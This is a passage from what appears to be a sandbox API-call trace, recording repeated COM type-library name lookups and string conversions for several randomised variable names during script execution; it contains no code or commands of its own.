pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8197e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQCQ1AA") returned 8 [0069.703] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lQCQ1AA", lHashVal=0x10cd91, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8197e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQCQ1AA") returned 8 [0069.704] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lQCQ1AA", lHashVal=0x10cd91, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.704] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lQCQ1AA") returned 0x10cd91 [0069.704] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lQCQ1AA" | out: _Dst="lQCQ1AA") returned 0x0 [0069.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lQCQ1AA") returned 8 [0069.704] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.704] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lQCQ1AA", lHashVal=0x10cd91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.704] IUnknown:Release (This=0x665ba50) returned 0xd [0069.704] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.704] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lQCQ1AA", lHashVal=0x10cd91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.704] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.704] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.704] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lQCQ1AA", lHashVal=0x10cd91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.704] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.704] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.704] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lQCQ1AA", lHashVal=0x10cd91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.704] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8197e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQCQ1AA") returned 8 [0069.704] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lQCQ1AA", lHashVal=0x10cd91, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.705] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.705] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8197e | out: _Dst=0x67c2d40) returned 0x0 [0069.705] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lQCQ1AA") returned 0x10d115 [0069.705] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lQCQ1AA" | out: _Dst="_B_var_lQCQ1AA") returned 0x0 [0069.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lQCQ1AA") returned 15 [0069.705] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.705] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lQCQ1AA", lHashVal=0x10d115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.705] IUnknown:Release (This=0x665ba50) returned 0xd [0069.705] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.705] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lQCQ1AA", lHashVal=0x10d115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.705] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.705] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.705] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lQCQ1AA", lHashVal=0x10d115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.705] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.705] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.705] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lQCQ1AA", lHashVal=0x10d115, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.705] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.705] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.705] IUnknown:Release (This=0x665ba50) returned 0xd [0069.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870cae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lQCQ1AA") returned 15 [0069.705] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lQCQ1AA", lHashVal=0x10d115, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31005100000000, pDummy=0x0) returned 0x0 [0069.705] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8197e | out: _Dst=0x144ec0) returned 0x0 [0069.705] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vXDxwX", lHashVal=0x101dd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819fa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vXDxwX") returned 7 [0069.706] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vXDxwX", lHashVal=0x101dd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819fa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vXDxwX") returned 7 [0069.706] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vXDxwX", lHashVal=0x101dd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.706] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vXDxwX") returned 0x101dd2 [0069.706] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vXDxwX" | out: _Dst="vXDxwX") returned 0x0 [0069.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vXDxwX") returned 7 [0069.706] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.706] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vXDxwX", lHashVal=0x101dd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.706] IUnknown:Release (This=0x665ba50) returned 0xd [0069.706] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.706] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vXDxwX", lHashVal=0x101dd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.706] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.706] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.706] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vXDxwX", lHashVal=0x101dd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.706] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.706] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.706] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vXDxwX", lHashVal=0x101dd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.706] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b819fa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vXDxwX") returned 7 [0069.706] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vXDxwX", lHashVal=0x101dd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.706] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.706] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b819fa | out: _Dst=0x67c2d40) returned 0x0 [0069.706] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vXDxwX") returned 0x10987b [0069.707] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vXDxwX" | out: _Dst="_B_var_vXDxwX") returned 0x0 [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vXDxwX") returned 14 [0069.707] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.707] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vXDxwX", lHashVal=0x10987b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.707] IUnknown:Release (This=0x665ba50) returned 0xd [0069.707] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.707] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vXDxwX", lHashVal=0x10987b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.707] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.707] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.707] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vXDxwX", lHashVal=0x10987b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.707] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.707] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.707] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vXDxwX", lHashVal=0x10987b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.707] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.707] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.707] IUnknown:Release (This=0x665ba50) returned 0xd [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870cde, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vXDxwX") returned 14 [0069.707] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vXDxwX", lHashVal=0x10987b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x77007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x77007800000000, pDummy=0x0) returned 0x0 [0069.707] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b819fa | out: _Dst=0x144ec0) returned 0x0 [0069.707] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KUAAQA", lHashVal=0x10a1ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a22, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KUAAQA") returned 7 [0069.707] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KUAAQA", lHashVal=0x10a1ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a22, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KUAAQA") returned 7 [0069.707] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KUAAQA", lHashVal=0x10a1ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.708] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KUAAQA") returned 0x10a1ed [0069.708] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KUAAQA" | out: _Dst="KUAAQA") returned 0x0 [0069.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KUAAQA") returned 7 [0069.708] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.708] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KUAAQA", lHashVal=0x10a1ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.708] IUnknown:Release (This=0x665ba50) returned 0xd [0069.708] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.708] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KUAAQA", lHashVal=0x10a1ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.708] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.708] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.708] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KUAAQA", lHashVal=0x10a1ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.708] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.708] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.708] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KUAAQA", lHashVal=0x10a1ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.708] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a22, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KUAAQA") returned 7 [0069.708] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KUAAQA", lHashVal=0x10a1ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.708] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.708] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81a22 | out: _Dst=0x67c2d40) returned 0x0 [0069.708] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KUAAQA") returned 0x101c57 [0069.708] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KUAAQA" | out: _Dst="_B_var_KUAAQA") returned 0x0 [0069.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KUAAQA") returned 14 [0069.708] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.708] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KUAAQA", lHashVal=0x101c57, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.708] IUnknown:Release (This=0x665ba50) returned 0xd [0069.708] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.708] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KUAAQA", lHashVal=0x101c57, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.709] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.709] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.709] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KUAAQA", lHashVal=0x101c57, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.709] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.709] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.709] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KUAAQA", lHashVal=0x101c57, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.709] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.709] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.709] IUnknown:Release (This=0x665ba50) returned 0xd [0069.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870d0e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KUAAQA") returned 14 [0069.709] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KUAAQA", lHashVal=0x101c57, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.709] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81a22 | out: _Dst=0x144ec0) returned 0x0 [0069.709] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Ncw4DABG", lHashVal=0x10b2bc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Ncw4DABG") returned 9 [0069.709] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Ncw4DABG", lHashVal=0x10b2bc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Ncw4DABG") returned 9 [0069.709] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Ncw4DABG", lHashVal=0x10b2bc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.709] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ncw4DABG") returned 0x10b2bc [0069.709] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="Ncw4DABG" | out: _Dst="Ncw4DABG") returned 0x0 [0069.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="Ncw4DABG") returned 9 [0069.709] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.709] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Ncw4DABG", lHashVal=0x10b2bc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.710] IUnknown:Release (This=0x665ba50) returned 0xd [0069.710] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.710] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Ncw4DABG", lHashVal=0x10b2bc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.710] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.710] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.710] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Ncw4DABG", lHashVal=0x10b2bc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.710] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.710] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.710] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Ncw4DABG", lHashVal=0x10b2bc, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.710] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Ncw4DABG") returned 9 [0069.710] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Ncw4DABG", lHashVal=0x10b2bc, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.710] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.710] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81a4a | out: _Dst=0x67c2d40) returned 0x0 [0069.710] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Ncw4DABG") returned 0x108a45 [0069.710] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_Ncw4DABG" | out: _Dst="_B_var_Ncw4DABG") returned 0x0 [0069.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_Ncw4DABG") returned 16 [0069.710] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.710] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Ncw4DABG", lHashVal=0x108a45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.710] IUnknown:Release (This=0x665ba50) returned 0xd [0069.710] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.710] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Ncw4DABG", lHashVal=0x108a45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.710] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.710] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.710] ITypeLib:RemoteIsName (in: This=0x665bd20, 